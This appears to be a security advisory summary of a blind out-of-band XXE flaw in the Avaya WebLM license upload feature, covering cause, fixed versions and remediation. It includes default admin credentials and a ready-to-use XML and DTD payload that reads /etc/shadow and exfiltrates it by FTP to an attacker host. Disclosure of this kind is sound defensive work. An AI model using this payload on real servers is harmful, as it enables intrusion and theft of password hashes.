Avaya WebLM Improper Restriction of XML External Entity Reference

An attacker must first authenticate to the WebLM admin interface (default credentials are admin:weblmadmin if not hardened) [ref_id=1]. After logging in, the attacker navigates to "Install License" and uploads a crafted XML file that defines an external entity referencing an attacker-controlled DTD file hosted on an HTTP server [ref_id=1]. The DTD file then instructs the server to read a local file (e.g., /etc/shadow) and exfiltrate its contents via an FTP request to the attacker's FTP server, enabling blind out-of-band XXE injection [ref_id=1].

The vulnerability resides in the License upload functionality of the Avaya Web License Manager (WebLM) admin interface. An authenticated user can upload a specially crafted XML file within the "Install License" feature, which is processed by the underlying Tomcat webserver without proper XML external entity restrictions.

The advisory does not include a patch diff, but the vendor released fixed versions 7.1.3.7 and 8.1.3 to address this vulnerability [ref_id=1]. The recommended remediation is to disable XML external entity processing in the XML parser used by the License upload functionality, preventing the server from resolving external DTDs and reading local files. SEC Consult recommends installing the vendor patch immediately and performing a thorough security review [ref_id=1].

1. Log in to the WebLM interface at $IP/WebLM/ using credentials (default admin:weblmadmin). 2. Navigate to "Install License". 3. Create an XML file containing: `<?xml version="1.0" ?> <!DOCTYPE a [ <!ENTITY % asd SYSTEM "http://$ATTACKER_IP/xxe_file.dtd"> %asd; %c; ]> <a>&rrr;</a>`. 4. Create a DTD file containing: `<!ENTITY % d SYSTEM "file:///etc/shadow"> <!ENTITY % c "<!ENTITY rrr SYSTEM 'ftp://$ATTACKER_IP:2121/%d;'>">`. 5. Start an HTTP server on port 80 and an FTP server on port 2121. 6. Upload the crafted XML file via the install button [ref_id=1].